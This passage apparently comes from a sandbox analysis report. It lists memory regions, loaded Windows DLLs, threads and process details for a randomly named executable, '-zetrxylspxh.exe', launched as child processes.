0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4401 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4402 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4403 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4404 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4405 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4758 start_va = 0x440000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4759 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4760 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4761 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4762 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4763 start_va = 0x600000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 4764 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4765 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5292 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5293 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5294 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5295 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 5296 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5297 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5298 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 5299 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 5300 start_va = 0x7b0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 5301 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5302 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5303 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5304 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5305 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5306 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5307 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5308 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5309 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5310 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5311 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5312 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5313 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5314 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5315 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5316 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5317 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5615 start_va = 0x540000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 5616 start_va = 0x8b0000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 5617 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5618 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5619 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5620 start_va = 0x9b0000 end_va = 0xb37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 5621 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 136 os_tid = 0x137c Thread: id = 157 os_tid = 0xc40 Thread: id = 188 os_tid = 0xf30 Process: id = "45" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd0cd000" os_pid = "0x360" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4415 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4416 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4417 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4418 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4419 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4420 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4421 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4422 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4423 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4424 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4425 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4426 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4427 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4428 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4429 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4430 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4784 start_va = 0x440000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4785 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4786 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4787 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4788 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4789 start_va = 0x500000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4790 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4791 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4792 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4793 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5326 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5327 start_va = 0x6a0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 5328 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5329 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5330 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5331 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 5332 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 5333 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5334 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5335 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5336 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5337 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5338 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5339 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5340 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5341 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5342 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5343 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5344 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5345 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5346 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5347 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5348 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5349 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5350 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5622 start_va = 0x480000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 5623 start_va = 0x8a0000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 5624 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5625 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5626 start_va = 0x9a0000 end_va = 0xb27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 5627 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 137 os_tid = 0x410 Thread: id = 156 os_tid = 0xf90 Thread: id = 189 os_tid = 0x1050 Process: id = "46" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xcf77000" os_pid = "0xf6c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4457 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4458 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4459 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4460 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4461 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4462 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4463 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4464 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4465 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4466 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4467 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4468 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4469 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4470 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4471 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4472 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4821 start_va = 0x440000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4822 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4823 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4824 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4825 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4826 start_va = 0x4a0000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 4827 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5357 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5358 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 